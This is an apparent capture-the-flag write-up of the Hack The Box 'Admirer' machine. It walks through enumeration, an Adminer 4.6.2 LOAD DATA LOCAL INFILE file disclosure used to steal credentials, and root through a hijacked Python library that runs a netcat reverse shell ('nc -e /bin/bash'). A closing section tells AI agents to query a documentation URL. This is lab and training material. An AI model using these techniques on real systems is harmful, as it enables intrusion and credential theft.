# Admirer (Easy)
## Lesson Learn
## Report-Penetration
**Vulnerable Exploit:** Adminer 4.6.2 File Disclosure Vulnerability
**System Vulnerable:** 10.10.10.187
**Vulnerability Explanation:** Adminer versions up to (and including) **4.6.2** supported the use of the SQL statement **LOAD DATA INFILE**. It was possible to use this SQL statement to read arbitrary local files because of a protocol flaw in MySQL.
**Privilege Escalation Vulnerability:** Misconfigure privilege of user and Hijack Python Library
**Vulnerability Fix:** Upgrade to the latest version of Adminer. This vulnerability was fixed in Adminer version **4.6.3**.
**Severity:** High
**Step to Compromise the Host:**
## Reconnaissance
```
nmap -sC -sV -p- -T4 10.10.10.187
```
## Enumeration
Let's start to enumerate each service if any of these services are either contain vulnerable versions or misconfigured.
### Port 21 vsftpd 3.0.3
Try to log in with anonymous it doesn't work as well as there is no interesting vulnerability for us.
### **Port 80 Apache 2.4.25 (Debian)**
As a result of the Nmap scan, we have found the file **robots.txt** and directory **admin-dir**.
By following the file robots.txt, we found some hints that directory **/admin-dir** contacts personal **contacts** and **cred** as well as username **waldo.** Unfortunately, we don't have permission to access it.
Let's start to enumerate and perform directory traversal by **gobuster** to check if there is any file or directory which we can access.
```
gobuster dir -u http://10.10.10.187/admin-dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt -t 20
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.187/admin-dir
[+] Method: GET
[+] Threads: 20
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: php,txt
[+] Timeout: 10s
===============================================================
2021/10/27 10:43:25 Starting gobuster in directory enumeration mode
===============================================================
/contacts.txt (Status: 200) [Size: 350]
/credentials.txt (Status: 200) [Size: 136]
===============================================================
2021/10/27 11:07:47 Finished
===============================================================
```
We have found the same as the hint provided by file **contacts.txt** and **credentials.txt.**
With all of these credentials, we found valid credentials for access to ftp service. On ftp service, we found 2 files **dump.sql** and **html.tar.gz.**
By enumerating on file **dump.sql,** we didn't see any interesting information. Then, extract the file html.tar.gz which contains some folders and files.
```
# xzfv = Extract Zip File Verbose
tar xzfv html.tar.gz
```
By enumerating on each file and folder, we found credentials stored on file **index.php** and **/utility-scripts/db\_admin.php.**
As we didn't found any database port was open on nmap scan. Which mean that, there will be database web portal somewhere. By browsing folder **utility-scripts** we got Forbidden.
But while include **info.php** which we have downloaded from ftp service, we return back the info.
By searching on google for the machine's name, we found out that there is a database whose name is similar to our machine.
Then, we found the database login web page of **adminer.php** with version **4.6.2.**
We found that Adminer 4.6.2 is vulnerable to file disclosure. [#Reference Link](#reference-link) at the end.
## Exploitation
First, let's configure our MySQL on our kali machine. We will create a database name, username, and password, and allow the host to connect.
Create database, username, and password for the specific host.
Creating a table of the database name Testing.
Change configuration from allowing access only to the local host to any host connected to MySQL database.
After changing the configuration, we need to restart MySQL service.
```
sudo service mysql restart
```
Let's connect from the database web portal to our database with the credentials that we have created.
By executing the exploit SQL command to read file /var/www/html/index.php, it's going to query the **row 123s**
```
LOAD DATA LOCAL INFILE 'var/www/html/index.php' INTO TABLE Testing FIELDS TERMINATED BY "\n"
```
As we see the Query was executed. Let's get back to our database and display the table Testing. We found out there are other credentials with the same username as **waldo**.
```
show databases;
use Testing;
show tables;
select * from Testing;
```
For our previous credentials, we found it doesn't valid on the ssh service. But for this one, it's working on ssh. We can log in ssh to the machine and we got a shell on the machine.
## Privilege Escalation
Check for `sudo -l` to check if there is any misconfigure. We can run /script root privilege.
On file backup.py, we found that it's imported file shutil and make\_archive function with 3 parameters (a, b, c).
Let's check on the file `admin_tasks.sh` and we found `backup_web()` functions which is interesting.
```
backup_web()
{
if [ "$EUID" -eq 0 ]
then
echo "Running backup script in the background, it might take a while..."
/opt/scripts/backup.py &
else
echo "Insufficient privileges to perform the selected operation."
fi
}
```
To exploit this misconfigure, we will create a reverse shell code and save it as **shutil.py**.
```
import os,socket,subprocess
def make_archive(a, b, c):
os.system("nc -e /bin/bash 10.10.14.31 5555")
```
Let's start listening on port 5555 with netcat.
```
nc -lvp 5555
```
Then, we export the **PYTHONPATH** to our **/tmp** folder which we create file **shutil.py**. Next, we will **run /opt/scripts/admin\_tasks.sh** with root privilege and select option **6 (Backup Web Data)**.
Once we executed **admin\_tasks** script, it will run **backup.py** file and import our exploit code on **shutil.py** and execute our reverse shell command.
## Reference Link
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://vulnableone.gitbook.io/vulnableone/course-review/cyber-security-courses-journey/oscp-journey/ctf/hack-the-box/linux-boxes/admirer-easy.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.